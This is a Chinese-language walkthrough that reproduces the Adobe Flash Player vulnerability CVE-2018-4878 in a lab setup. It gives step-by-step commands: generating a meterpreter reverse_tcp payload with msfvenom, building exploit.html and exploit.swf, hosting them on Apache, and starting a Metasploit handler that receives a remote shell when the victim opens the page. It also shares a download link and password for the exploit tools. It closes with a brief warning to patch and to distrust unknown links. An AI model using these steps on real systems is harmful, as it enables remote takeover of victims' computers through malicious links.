漏洞概述
2018年2月1日, Adobe官方发布了Adobe Flash Player系列产品的安全通告(APSA18-01),该0day漏洞编号为CVE-2018-4878,目前最新版本28.0.0.137及其以前版本的Adobe Flash Player均受漏洞影响,Adobe官方于2月5日发布此漏洞补丁。
攻击者可以将恶意Flash文件嵌入Office文档,网页,或者桌面应用,当用户打开时便会收到攻击
此次复现为网页链接的方式进行复现受害者访问我们的flash链接就会被远程代码执行并且直接被getshell
攻击主机:Kali linux ip:172.16.221.213
受害者主机 window7 ip:172.16.221.247
实验用到的工具会在文章末尾分享
攻击主机配置
1.首先解压我们用到的文件
unzip CVE-2018-4878-master.zip
2.用msfvenom生成shell代码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.221.213 LPORT=4444 -f python > code.txt
-p –payload < payload> 指定需要使用的payload
windows/meterpreter/reverse_tcp 我们选择使用的攻击载荷
LHOST指定ip地址
LPORT指定监听的端口可任意更改
-f –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)
(1)查看代码文件
cat code.txt
(2)进入到我们解压用到的文件目录,编辑cve-2018-4878.py文件
修改下面的文件路径
别忘了保存修改并退出3.python执行脚本文件
python cve-2017-4878-master.py
ls 查看到生成了两个文件
4.启动Apache服务
(1)service apache2 start
我们可以看到已经启动成功了
(2)将我们上两个文件复制到apache2服务的网页目录
cp exlpoit.html /var/www/html/exploit.html
cp exploit.swf /var/www/html/exploit.swf
现在我们的攻击环境基本配置完成,只要受害者访问我的链接就可以直接被远程控制
5.启动armitage:属于图形化的metasploit也方便演示
(1)使用handler监听模块
use exploit/multi/handler
(2)设置攻击载荷是我们在生成文件的时候所选择的攻击载荷
set payload windows/meterpreter/reverse_tcp
set lhost 172.16.221.213 设置攻击主机的ip
set lport 4444 设置监听端口为4444(我们在用msfvenom生成代码文件是设置的端口)
6.开启监听
exploit
7.windows7安装Adobeflash 28.0 后用浏览器访问http://172.16.221.213/exploit.html
8.此时我们可以看到Kali linux已经获取到sessions
复现完成,此时我们就可以查看一下系统配置
当然你也可以不用此图形化直接用命令行(命令都是一样的)
msfconsole 启动
顺便用shell查看下ip地址
在真实环境下,很多黑客会基于社会工程学诱导用户点击来达到黑客的目的,也希望大家小心陌生链接及时升级安全补丁,以免造成损失
工具链接:链接:https://pan.baidu.com/s/1kGmB2eZWf9PBFeXzyxOnkg 密码:ut52